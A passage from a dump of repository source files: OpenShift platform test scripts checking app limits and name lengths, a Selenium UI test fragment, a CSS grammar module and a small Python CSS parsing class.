#baseutils.click_element_by_link_text(self,\"Express Console\")\n #time.sleep(5)\n baseutils.wait_element_present_by_id(self,\"express_domain_namespace\")\n _value=self.driver.find_element_by_id(\"express_domain_namespace\").get_attribute(\"value\")\n _newvalue=_value[:len(_value)-1]\n print \"======================\"\n print _newvalue\n #baseutils.click_element_by_xpath(self,\"//div[@id='domains']/div[2]/div[2]/div/a\")\n #time.sleep(2)\n baseutils.wait_element_present_by_id(self,\"express_domain_namespace\")\n baseutils.input_by_id(self,\"express_domain_namespace\",_newvalue)\n baseutils.click_element_by_id(self,\"express_domain_submit\")\n time.sleep(10)\n baseutils.assert_element_present_by_link_text(self,_newvalue)\n time.sleep(20)\n# baseutils.click_element_by_css_no_wait(self,\"a.close > img\")\n #baseutils.wait_element_not_displayed_by_id(self,\"spinner\")\n #baseutils.assert_text_equal_by_css(self,\"Congratulations! 
You successfully updated your domain\",\"div.message.success\")\n self.assert_app_url_after_change(self.exist_app,_newvalue)\n \n\n def test_l_create_bsame_appname_w_exist(self):\n # _appname=self.generate_app_name()\n self.create_application(self.exist_app,\"php\")\n _domain=self.get_domain_name()\n _error=\"An application named \\'\"+self.exist_app+\"\\' in namespace \\'\"+_domain+\"\\' already exists\"\n baseutils.assert_text_equal_by_css(self,_error,\"div.error.message\")\n '''\n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n #HTMLTestRunner.main()\n" }, { "alpha_fraction": 0.5935605764389038, "alphanum_fraction": 0.6066287755966187, "avg_line_length": 24.751218795776367, "blob_id": "8fe62cfc4b3439a1cdb3752a4b147404598b01ea", "content_id": "6d846acdf5462ac0f5b9ecc10d8a184ea25af7af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5284, "license_type": "no_license", "max_line_length": 74, "num_lines": 205, "path": "/automation/open/lib/supports/XML/CSSgrammar.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# vim:ts=4:sw=4\n# \n#\n# Copyright (C) 1999-2004 Keith Dart <[email protected]>\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU\n# Lesser General Public License for more details.\n\n\"\"\"\nMODULE_DESCRIPTION\n\n\"\"\"\n\nimport sys\n\ndef _test(argv):\n\tpass # XXX\n\n\n# lexer\n\"\"\"\n\nunicode\t\t\\\\[0-9a-f]{1,4}\nlatin1\t\t[¡-ÿ]\nescape\t\t{unicode}|\\\\[ -~¡-ÿ]\nstringchar\t{escape}|{latin1}|[ !#$%&(-~]\nnmstrt\t\t[a-z]|{latin1}|{escape}\nnmchar\t\t[-a-z0-9]|{latin1}|{escape}\nident\t\t{nmstrt}{nmchar}*\nname\t\t{nmchar}+\nd\t\t[0-9]\nnotnm\t\t[^-a-z0-9\\\\]|{latin1}\nw\t\t[ \\t\\n]*\nnum\t\t{d}+|{d}*\\.{d}+\nstring\t\t\\\"({stringchar}|\\')*\\\"|\\'({stringchar}|\\\")*\\'\n\n%x COMMENT\n%s AFTER_IDENT\n\n%%\n\"/*\"\t\t\t\t{BEGIN(COMMENT);}\n<COMMENT>\"*/\"\t\t\t{BEGIN(0);}\n<COMMENT>\\n\t\t\t{/* ignore */}\n<COMMENT>.\t\t\t{/* ignore */}\n@import\t\t\t\t{BEGIN(0); return IMPORT_SYM;}\n\"!\"{w}important\t\t\t{BEGIN(0); return IMPORTANT_SYM;}\n{ident}\t\t\t\t{BEGIN(AFTER_IDENT); return IDENT;}\n{string}\t\t\t{BEGIN(0); return STRING;}\n\n{num}\t\t\t\t{BEGIN(0); return NUMBER;}\n{num}\"%\"\t\t\t{BEGIN(0); return PERCENTAGE;}\n{num}pt/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}mm/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}cm/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}pc/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}in/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}px/{notnm}\t\t\t{BEGIN(0); return LENGTH;}\n{num}em/{notnm}\t\t\t{BEGIN(0); return EMS;}\n{num}ex/{notnm}\t\t\t{BEGIN(0); return EXS;}\n\n<AFTER_IDENT>\":\"link\t\t{return LINK_PSCLASS_AFTER_IDENT;}\n<AFTER_IDENT>\":\"visited\t{return VISITED_PSCLASS_AFTER_IDENT;}\n<AFTER_IDENT>\":\"active\t{return ACTIVE_PSCLASS_AFTER_IDENT;}\n<AFTER_IDENT>\":\"first-line\t{return FIRST_LINE_AFTER_IDENT;}\n<AFTER_IDENT>\":\"first-letter\t{return FIRST_LETTER_AFTER_IDENT;}\n<AFTER_IDENT>\"#\"{name}\t\t{return HASH_AFTER_IDENT;}\n<AFTER_IDENT>\".\"{name}\t\t{return CLASS_AFTER_IDENT;}\n\n\":\"link\t\t\t\t{BEGIN(AFTER_IDENT); return LINK_PSCLASS;}\n\":\"visited\t\t\t{BEGIN(AFTER_IDENT); return VISITED_PSCLASS;}\n\":\"active\t\t\t{BEGIN(AFTER_IDENT); return ACTIVE_PSCLASS;}\n\":\"first-line\t\t\t{BEGIN(AFTER_IDENT); return FIRST_LINE;}\n\":\"first-letter\t\t\t{BEGIN(AFTER_IDENT); return FIRST_LETTER;}\n\"#\"{name}\t\t\t{BEGIN(AFTER_IDENT); return HASH;}\n\".\"{name}\t\t\t{BEGIN(AFTER_IDENT); return CLASS;}\n\nurl\\({w}{string}{w}\\)\t\t\t\t\t|\nurl\\({w}([^ \\n\\'\\\")]|\\\\\\ |\\\\\\'|\\\\\\\"|\\\\\\))+{w}\\)\t\t{BEGIN(0); return URL;}\nrgb\\({w}{num}%?{w}\\,{w}{num}%?{w}\\,{w}{num}%?{w}\\)\t{BEGIN(0); return RGB;}\n\n[-/+{};,#:]\t\t\t{BEGIN(0); return *yytext;}\n[ \\t]+\t\t\t\t{BEGIN(0); /* ignore whitespace */}\n\\n\t\t\t\t{BEGIN(0); /* ignore whitespace */}\n\\<\\!\\-\\-\t\t\t{BEGIN(0); return CDO;}\n\\-\\-\\>\t\t\t\t{BEGIN(0); return CDC;}\n.\t\t\t\t{fprintf(stderr, \"%d: Illegal character (%d)\\n\",\n\t\t\t\t lineno, *yytext);}\n\n\"\"\"\n\n\n# yacc\n\"\"\"\nstylesheet\n : [CDO|CDC]* [ import [CDO|CDC]* ]* [ ruleset [CDO|CDC]* ]*\n ;\nimport\n : IMPORT_SYM [STRING|URL] ';'\t\t/* E.g., @import url(fun.css); */\n ;\nunary_operator\n : '-' | '+'\n ;\noperator\n : '/' | ',' | /* empty */\n ;\nproperty\n : IDENT\n ;\nruleset\n : selector [ ',' selector ]*\n '{' declaration [ ';' declaration ]* '}'\n ;\nselector\n : simple_selector+ [ pseudo_element | solitary_pseudo_element ]?\n | solitary_pseudo_element\n ;\n\t/* An \"id\" is an ID that is attached to an element type\n\t** on its left, as in: P#p007\n\t** A \"solitary_id\" is an ID that is not so attached,\n\t** as in: #p007\n\t** Analogously for classes and pseudo-classes.\n\t*/\nsimple_selector\n 
: element_name id? class? pseudo_class?\t/* eg: H1.subject */\n | solitary_id class? pseudo_class?\t\t/* eg: #xyz33 */\n | solitary_class pseudo_class?\t\t\t/* eg: .author */\n | solitary_pseudo_class\t\t\t/* eg: :link */\n ;\nelement_name\n : IDENT\n ;\npseudo_class\t\t\t\t\t/* as in: A:link */\n : LINK_PSCLASS_AFTER_IDENT\n | VISITED_PSCLASS_AFTER_IDENT\n | ACTIVE_PSCLASS_AFTER_IDENT\n ;\nsolitary_pseudo_class\t\t\t\t/* as in: :link */\n : LINK_PSCLASS\n | VISITED_PSCLASS\n | ACTIVE_PSCLASS\n ;\nclass\t\t\t\t\t\t/* as in: P.note */\n : CLASS_AFTER_IDENT\n ;\nsolitary_class\t\t\t\t\t/* as in: .note */\n : CLASS\n ;\npseudo_element\t\t\t\t\t/* as in: P:first-line */\n : FIRST_LETTER_AFTER_IDENT\n | FIRST_LINE_AFTER_IDENT\n ;\nsolitary_pseudo_element\t\t\t\t/* as in: :first-line */\n : FIRST_LETTER\n | FIRST_LINE\n ;\n\t/* There is a constraint on the id and solitary_id that the\n\t** part after the \"#\" must be a valid HTML ID value;\n\t** e.g., \"#x77\" is OK, but \"#77\" is not.\n\t*/\nid\n : HASH_AFTER_IDENT\n ;\nsolitary_id\n : HASH\n ;\ndeclaration\n : property ':' expr prio? \n | /* empty */\t\t\t\t/* Prevents syntax errors... */\n ;\nprio\n : IMPORTANT_SYM\t \t\t/* !important */\n ;\nexpr\n : term [ operator term ]*\n ;\nterm\n : unary_operator?\n [ NUMBER | STRING | PERCENTAGE | LENGTH | EMS | EXS\n | IDENT | hexcolor | URL | RGB ]\n ;\n\t/* There is a constraint on the color that it must\n\t** have either 3 or 6 hex-digits (i.e., [0-9a-fA-F])\n\t** after the \"#\"; e.g., \"#000\" is OK, but \"#abcd\" is not.\n\t*/\nhexcolor\n : HASH | HASH_AFTER_IDENT\n ;\n\n\n\n\n\"\"\"\n\n\nif __name__ == \"__main__\":\n\t_test(sys.argv)\n\n" }, { "alpha_fraction": 0.5682187080383301, "alphanum_fraction": 0.5733622312545776, "avg_line_length": 33.839622497558594, "blob_id": "1ccc93cbb46268f44e64489458fc21936dd806d9", "content_id": "c4c6a7aaa139a134e8a9b02661e1008c38c75ec6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3694, "license_type": "no_license", "max_line_length": 182, "num_lines": 106, "path": "/automation/open/testmodules/RT/node/app_limit_per_user_concurrent_creation.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n??\n??\n\"\"\"\n\nimport os\nimport string\nimport rhtest\n\nimport testcase\nimport common\nimport OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n try:\n self.app_limit_per_user = string.atoi(os.environ[\"OPENSHIFT_app_limit_per_user\"])\n except:\n self.app_limit_per_user = 3\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name_prefix = common.getRandomString(5)\n\n def finalize(self):\n ret = common.set_max_gears(self.user_email, common.DEV_MAX_GEARS)\n if ret != 0:\n self.info(\"Failed to set max gears back to %d\" % (common.DEV_MAX_GEARS))\n else:\n self.info(\"Successfully set max gears back to %d\" % (common.DEV_MAX_GEARS))\n common.env_setup()\n\nclass AppLimitPerUserConcurentCreation(OpenShiftTest):\n def test_method(self):\n if self.config.options.run_mode == 'DEV':\n step = testcase.TestCaseStep(\"Set max gear to %d\" % (self.app_limit_per_user),\n common.set_max_gears,\n function_parameters = [self.user_email, self.app_limit_per_user],\n expect_return = 0,\n expect_description = \"Max gear should be set successfully\")\n (ret, output) = step.run()\n if ret != 0:\n self.info(output)\n self.info(\"Failed to 
set max gears for user\")\n\n        ret_list = []\n        for i in range(2):\n            common.env_setup()  # clean up\n            step = testcase.TestCaseStep(\n                \"Try %s: Create more apps than app_limit_per_user \"%(i + 1) +\n                \"setting upon %s concurrent creation\" %(self.app_limit_per_user + 2),\n                self.concurrent_creation_step,\n                function_parameters=[1, self.app_limit_per_user + 2],\n                expect_description=\"No more apps beyond limit should be created\")\n\n            (ret_dict, output) = step.run()\n            # print ret_dict\n            if ret_dict.values().count(0) == self.app_limit_per_user:\n                ret_list.append(0)\n                # Init OSConf to clean these apps in next interval\n                OSConf.initial_conf()\n            else:\n                ret_list.append(1)\n                # Init OSConf to clean these apps in next script\n                OSConf.initial_conf()\n                break\n\n\n        #print ret_list\n        if ret_list.count(1) > 0:\n            print \"Upon %s concurrent creation, more apps than app_limit_per_user were created - [FAIL]\" %(self.app_limit_per_user + 2)\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n        else:\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n    def concurrent_creation_step(self, start, end):\n        command_list = []\n        for i in range(start, end + 1):\n            self.app_name = \"%s%s\" %(self.app_name_prefix, i)\n            command_list.append(\"rhc app create %s %s -l %s -p '%s' --no-git %s\" %(self.app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n\n        ret_dict = common.multi_subprocess(command_list)\n        for i in ret_dict.keys():\n            print \"Command {%s} return: %s\" %(i, ret_dict[i])\n\n        return ret_dict\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(AppLimitPerUserConcurentCreation)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, {
"alpha_fraction": 0.5701587200164795, "alphanum_fraction": 0.5965079069137573, "avg_line_length": 36.05882263183594, "blob_id": "8ab7ba4b24129f7319600852f6143c9ff5287385", "content_id": "79581d7becbe344dc6e30aeaea85c9e05932e6f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3150, "license_type": "no_license", "max_line_length": 202, "num_lines": 85, "path": "/automation/open/testmodules/RT/client/domain_app_name_length.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.user_email = self.config.OPENSHIFT_user_email\n        self.user_passwd = self.config.OPENSHIFT_user_passwd\n        self.app_type = common.app_types['ruby']\n        self.allowed_app_name = common.getRandomString(32) #'ab012345678901234567890123456789'\n        self.forbidden_app_name = common.getRandomString(33) #'abc012345678901234567890123456789'\n        self.forbidden_domain_name = common.getRandomString(17)\n        self.allowed_domain_name = common.getRandomString(16)\n        self.current_domain_name = common.get_domain_name(self.user_email, self.user_passwd)\n        self.tcms_testcase_id = 122309\n        common.env_setup()\n        self.steps_list = []\n\n    def finalize(self):\n        try:\n            common.destroy_app(self.allowed_app_name)\n            common.destroy_app(self.forbidden_app_name)\n            os.system(\"rm -rf %s\"%self.allowed_app_name)\n            os.system(\"rm -rf %s\"%self.forbidden_app_name)\n        except:\n            pass\n\n\nclass DomainAppNameLength(OpenShiftTest):\n    def test_method(self):\n\n        step = testcase.TestCaseStep(\"Alter domain to a namespace longer than 16 characters\",\n            \"rhc domain update %s %s -l %s -p '%s' %s\" %(self.current_domain_name, self.forbidden_domain_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n            expect_return=\"!0\",\n            )\n        self.steps_list.append(step)\n\n        step = testcase.TestCaseStep(\"Create app with a 32-character name (the maximum allowed)\",\n            common.create_app,\n            function_parameters=[self.allowed_app_name, self.app_type, self.user_email, self.user_passwd, False],\n            expect_return=0\n            )\n        self.steps_list.append(step)\n\n        step = testcase.TestCaseStep(\"Create app with a name longer than 32 characters\",\n            \"rhc app create %s %s -l %s -p '%s' %s\" %(self.forbidden_app_name, self.app_type, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n            expect_return=\"!0\",\n            )\n        self.steps_list.append(step)\n\n\n        case = testcase.TestCase(\"Create domain and app whose names exceed the maximum allowed length\",\n            self.steps_list)\n        case.run()\n\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(DomainAppNameLength)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, {
"alpha_fraction": 0.5613134503364563, "alphanum_fraction": 0.5631044507026672, "avg_line_length": 33.6790885925293, "blob_id": "e76291af47328e9f5267ee69f038c226eada1802", "content_id": "517c7aa28906531362e4de122bb4066cd29ca33d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16750, "license_type": "no_license", "max_line_length": 77, "num_lines": 483, "path": "/automation/open/lib/supports/XML/css.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n\"\"\"\n\ncss.py\n-----------\n\nProvides a CSS class, which reads in a css specification in\nfile or string form and wraps it in a dictionary-like object.\nSee the class documentation for more info.\n\nCopyright 2000 by Matthew C. Gushee\n\nThe author hereby grants permission to use, redistribute, or\nmodify this program for any purpose, on condition that the\nabove copyright notice and this statement be retained without\nalteration. This program carries no warranty of any kind.\n\nPlease send comments and questions to <[email protected]>.\n\n\"\"\"\n\nimport string, re, copy, os\nfrom UserDict import UserDict\n\nclass CSS(UserDict):\n    \"\"\"\n\n    A dictionary-like wrapper for CSS style specifications.\n\n    \n    Usage:\n\n        mycss = CSS('./mystyle.css')\n        mycss = CSS(css_data)\n\n    Instances may be created based on CSS files, or on data\n    in CSS or Python dictionary form. 
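For example, a minimal\n    illustrative sketch of the dictionary form (the selector and\n    properties below are invented for illustration, not taken from any\n    real stylesheet):\n\n        mycss = CSS({'H1': {'color': 'red', 'font-family': ['Helvetica', 'sans-serif']}})\n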
See __init__ method\n documentation for details.\n\n\n Public methods:\n\n getspec Return style data for a particular context.\n\n setspec Define style data for a particular context.\n\n merge Assimilate data from another CSS instance.\n\n remove Remove specified data from the current instance.\n\n\n Additionally, the CSS class overloads the + and - operators to\n provide a convenient means of adding and subtracting data, e.g.:\n\n this_style = this_style + that_style\n\n (that_style may be a CSS class instance or a dictionary in the\n same form as CSS.data) If the two objects have any keys in common,\n the values in the right-hand object take precedence. Thus, the\n above operation may overwrite data in this_style. If you want to\n preserve all existing data while adding new data, simply reverse\n the order:\n \n this_style = that_style + this_style\n\n The following removes all data contained in that_style from\n this_style:\n\n this_style = this_style - that_style\n\n You can even empty all the data by doing this:\n \n this_style = this_style - this_style\n\n\n Parsed style data is stored as a dictionary in the form:\n\n {<selector>: {<prop-name>: <prop-value>, ...}, ...}\n \n <selector> is a string representing a CSS selector (an\n element name, class name, or ID), or a tuple of such strings.\n \n <prop-name> is a string representing a style property name.\n\n <prop-value> is a string representing a property value, or\n a list of such strings (as in the case of font families:\n ['Helvetica', 'Arial', 'Geneva', 'sans-serif']).\n\n Note that if a stylesheet contains a group of properties with\n multiple selectors, the CSS instance will have one key for each\n of these selectors. E.g.,\n\n .MainMenu, .WhatsNew, H5 { spam: eggs }\n\n ... becomes\n\n {'.MainMenu': {'spam': 'eggs'}, '.WhatsNew', {'spam': 'eggs'},\n H5 {'spam': 'eggs'}}\n\n Hierarchical selectors, on the other hand, are parsed into tuples.\n For example:\n\n .BodyText A { spam: eggs }\n\n ... becomes\n\n {('.BodyText', 'A'): {'spam': 'eggs'}}\n\n In this documentation, I use the term 'context' to refer to a\n single or hierarchical selector *in the form* used by the CSS\n class methods -- a string like 'BODY', or a sequence like\n ('TABLE', 'A'), or ['.Menu', 'UL']. Although the methods are\n currently written to accept context arguments in list form, I\n may at some point decide to restrict them to tuples.\n \n \n The current version of this class will probably fail to parse\n most stylesheets containing syntax errors. It makes no attempt\n to validate the stylesheet, however, so any data following CSS\n syntax will work.\n\n \"\"\"\n\n ## capture a specification group -- e.g., a group of style\n ## properties pertaining to a particular context\n specgroup = re.compile(r\"([^{}]+){([^{}]+)}\")\n ## weed out supposed property definitions that are empty\n ## or missing the required colon.\n bogus = re.compile(r\"^[^:]*$\")\n\n def __init__(self, datasrc, defaultcontext=None):\n \"\"\"\n Arguments:\n \n datasrc -- The data source for this instance. May be given in\n any of three forms: (1) the name of a CSS file, (2) a string\n containing style data in CSS syntax, or (3) a dictionary in\n the same form as self.data\n\n defaultcontext -- (OPTIONAL) The default context from which\n others inherit properties. If your stylesheet is for an\n ordinary web page, for example, you might use \"BODY\" as a\n default context. 
Must be present in the data source.\n\n \"\"\"\n UserDict.__init__(self)\n if type(datasrc) is type({}):\n self.data = datasrc\n else:\n if os.path.isfile(datasrc):\n cssdata = self._readin(datasrc)\n elif type(datasrc) is type(''):\n cssdata = datasrc\n else:\n raise RuntimeError, 'Invalid data type: %s' % type(datasrc)\n self._parse(cssdata)\n self.defaultcontext = defaultcontext\n\n def __add__(self, other):\n if ((type(other) is type(self) and\n other.__class__ is self.__class__) or\n type(other) is type({})):\n return CSS(self.merge(other))\n elif os.path.isfile(other) or type(other) is type({}):\n temp = CSS(other)\n newcss = CSS(self.merge(temp))\n del(temp)\n return newcss\n else:\n raise RuntimeError, 'Invalid data type: %s' % type(other)\n\n def __radd__(self, other):\n if os.path.isfile(other) or type(other) is type({}):\n temp = CSS(other)\n newcss = CSS(self.merge(temp, 1))\n del(temp)\n return newcss\n else:\n raise RuntimeError, 'Invalid data type: %s' % type(other)\n\n def __sub__(self, other):\n if ((type(other) is type(self) and\n other.__class__ is self.__class__) or\n type(other) is type({})):\n return CSS(self.remove(other))\n elif os.path.isfile(other) or type(other) is type({}):\n temp = CSS(other)\n newcss = CSS(self.remove(temp))\n del(temp)\n return newcss\n else:\n raise RuntimeError, 'Invalid data type: %s' % type(other)\n\n def __rsub__(self, other):\n if os.path.isfile(other) or type(other) is type({}):\n temp = CSS(other)\n newcss = CSS(self.remove(temp, 1))\n del(temp)\n return newcss\n else:\n raise RuntimeError, 'Invalid data type: %s' % type(other)\n\n def _error(self, strict, errmsg=''):\n if strict:\n raise RuntimeError, errmsg\n else:\n return 0\n\n def _readin(self, file):\n try:\n f = open(file, 'r')\n except IOError:\n print 'Unable to read file %s' % file\n css = f.read()\n f.close()\n return css\n\n def _parse(self, cssdata):\n propdict = {}\n while cssdata:\n spec = self.specgroup.match(cssdata)\n if spec is None:\n break\n selectors, stylegroup = spec.groups()\n ## Parse the styles first. That way, if there are\n ## multiple identifiers, we don't have to redo\n ## the styles for each one.\n for style in string.split(stylegroup, ';'):\n if self.bogus.match(style):\n break\n style = string.split(style, ':')\n prop = string.strip(style[0])\n val = string.split(style[1], ',')\n if len(val) < 2:\n propdict[prop] = string.strip(val[0])\n else:\n propdict[prop] = []\n for item in val:\n propdict[prop].append(string.strip(item))\n for sel in string.split(selectors, ','):\n sel = string.strip(sel)\n ## Hierarchical selector, e.g. .Body P\n hiersel = string.split(sel)\n if len(hiersel) > 1:\n sel = tuple(hiersel)\n if not self.has_key(sel):\n self[sel] = {}\n for prop, val in propdict.items():\n if not self[sel].has_key(prop):\n self[sel][prop] = val\n cssdata = cssdata[spec.end():]\n\n def getspec(self, context=None, strict=0, inherit=1,\n usecurrent=[], set={}):\n \"\"\"\n Return dictionary of style properties for a given context.\n\n Arguments (all optional):\n\n context -- (A dictionary key representing the context where\n this style spec will apply). If omitted, self.defaultcontext\n will be used.\n\n strict -- (boolean) If true, any properties having values of\n None, and any context names that do not exist in self.data,\n will cause errors. If false, values of None will be returned,\n and non-existent context names will be silently ignored.\n\n inherit -- (boolean) If true, the returned data will include\n inherited properties. 
If false, only properties explicitly\n defined for this context will be returned. If true and\n 'usecurrent' is empty , all properties applying to this\n context, whether explicitly defined or inherited, will be\n returned.\n\n usecurrent -- (list of property names) If any names are\n listed, only the listed properties will be returned, using\n inherited values for those not explicitly defined in this\n context.\n\n set -- (dictionary of property names and values) Sets\n properties to the specified values. This argument overrides\n existing values. If a 'set' argument is supplied, 'inherit'\n is false, and 'usecurrent' is omitted, the method will simply\n return the value of 'set'.\n\n \"\"\"\n spec = {}\n base = self.defaultcontext or ''\n if type(context) is type(''):\n context = [context]\n elif type(context) is type(()):\n if self.data.has_key(context):\n context = list(context) + [context]\n else:\n context = list(context)\n if inherit:\n if base and context[0] != base:\n context.insert(0, base)\n else:\n context = context[-1] \n if usecurrent or not inherit:\n inheritall = 0\n else:\n inheritall = 1\n context = context or base\n if usecurrent:\n ## Work down from current context to default\n context.reverse()\n found = []\n for prop in usecurrent:\n for layer in context:\n if self.data.has_key(layer):\n propdict = self.data[layer]\n if propdict.has_key(prop):\n spec[prop] = propdict[prop]\n found.append(prop)\n break\n elif strict:\n raise RuntimeError, \"Invalid selector: '%s'.\" % layer\n for prop in usecurrent:\n if prop not in found:\n spec[prop] = None\n if inheritall:\n ## Work up from default context\n for layer in context:\n if self.data.has_key(layer):\n for prop in self.data[layer].keys():\n spec[prop] = self.data[layer][prop]\n elif strict:\n raise RuntimeError, \"Invalid selector: '%s'.\" % layer\n if set:\n for prop in set.keys():\n spec[prop] = set[prop]\n if strict:\n for prop in spec.keys():\n if spec[prop] is None:\n raise RuntimeError, \"Property not found: '%s'.\" % prop\n return spec \n \n def setspec(self, context=None, strict=0, inherit=1,\n keeponly=[], set={}):\n \"\"\"\n Define style properties for a particular context.\n\n [ DON'T USE THIS YET! Something is screwy in the way this\n method calls self.getspec(). To be fixed soon. ]\n\n Arguments (all optional):\n\n context -- (A dictionary key representing the context where\n this style spec will apply). The key may, but need not, be\n present in the instance data. If omitted, self.defaultcontext\n will be used.\n\n strict -- (boolean) See getspec documentation.\n\n inherit -- (boolean) If true, any existing properties applying\n to the given context, but not specified in 'set', will be\n retained, including inherited properties. If false, the new\n settings will include only the properties explicitly defined\n for the context.\n\n keeponly -- (list of property names) If empty, all existing\n properties will be retained. If any property names are listed,\n only the properties listed here or in 'set' will be kept; all\n others will be removed.\n\n set -- (dictionary of property names and values) Sets\n properties to the specified values. 
This argument overrides\n inherited values.\n \n \"\"\"\n if context is None:\n try:\n ## MakeError is undefined, so raises exception\n context = self.defaultcontext | MakeError\n except:\n raise RuntimeError, 'No context for style spec.'\n if not self.data.has_key(context):\n self.data[context] = {}\n if keeponly:\n newspec = self.getspec(context, strict,\n usecurrent=keeponly, set=set)\n elif inherit:\n newspec = self.getspec(context, strict, set=set)\n elif set:\n newspec = set\n else:\n newspec = self.getspec(context)\n for prop in set.keys():\n self.data[context] = newspec\n\n\n def merge(self, cssobj, selfish=0):\n \"\"\"\n Assimilate data from another CSS instance.\n\n Arguments:\n\n cssobj -- a CSS class instance\n\n selfish -- (optional, boolean) In case of conflicts, this\n argument specifies whether new or existing data takes\n precedence. If false, new data (specified in 'cssobj')\n will take precedence; if true, all existing data will\n be preserved.\n\n \"\"\"\n if selfish:\n ## Dunno why I was getting errors with this ...\n ## result = copy.deepcopy(cssobj)\n result = {}\n for k in cssobj.keys():\n result[k] = copy.copy(cssobj[k])\n newdata = self.data\n else:\n ## result = copy.deepcopy(self.data)\n result = {}\n for k in self.data.keys():\n result[k] = copy.copy(self.data[k]) \n newdata = cssobj\n for k in newdata.keys():\n if result.has_key(k):\n for l in newdata[k].keys():\n result[k][l] = newdata[k][l]\n else:\n result[k] = newdata[k]\n return result\n\n def remove(self, cssobj, selfish=0):\n \"\"\"\n Remove specified data from the current instance.\n\n cssobj -- a CSS class instance\n\n selfish -- (optional, boolean) If true, the contents\n of self.data will be removed from cssobj.data. If false,\n the contents of cssobj.data will be removed from\n self.data.\n \n \"\"\"\n if selfish:\n result = copy.deepcopy(cssobj)\n rmdata = self.data\n else:\n result = copy.deepcopy(self.data)\n rmdata = cssobj \n for k in rmdata.keys():\n if result.has_key(k):\n for m in rmdata[k].keys():\n if result[k].has_key(m):\n del result[k][m]\n if not result[k]:\n del result[k]\n return result\n\n \nif __name__ == '__main__':\n import sys, os\n cssfile = raw_input('What file would you like to parse?\\n> ')\n cssfile = string.strip(cssfile)\n if string.find(cssfile, '~/') == 0:\n try:\n cssfile = os.path.join(os.environ['HOME'], cssfile[2:])\n except:\n print \"\"\"This system appears not to support filenames beginning\nwith '~'. Please try again using the full path.\n\"\"\"\n sys.exit()\n try:\n mycss = CSS(cssfile)\n print \"\"\"'%s' successfully parsed. Data is as follows:\n\n%s\n \"\"\" % (cssfile, mycss)\n except:\n print \"\"\"Failed to parse '%s.' Please check for CSS syntax\nerrors. 
If your CSS file is correct, please send a\ndetailed bug report to <[email protected]>, including\na copy of '%s'.\n    \"\"\" % (cssfile, cssfile)\n" }, {
"alpha_fraction": 0.6840579509735107, "alphanum_fraction": 0.717391312122345, "avg_line_length": 23.64285659790039, "blob_id": "f0a92f637daba93fb7ad799b08ca49fc8d3b2d98", "content_id": "da31db1e7d89957d9360677f8cbbb67f859ba0da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 690, "license_type": "no_license", "max_line_length": 104, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/ruby18_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nAug 1, 2012\n\n\"\"\"\nimport rhtest\nimport common\nfrom ruby18_without_jenkins import Ruby18HotDeployWithoutJenkins\n\nclass Ruby18HotDeployWithJenkins(Ruby18HotDeployWithoutJenkins):\n    def __init__(self, config):\n        Ruby18HotDeployWithoutJenkins.__init__(self, config)\n        self.config.jenkins_is_needed = True\n        self.config.summary = \"[US2443]Hot deployment support for application - with Jenkins - ruby-1.8\"\n    \nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(Ruby18HotDeployWithJenkins)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    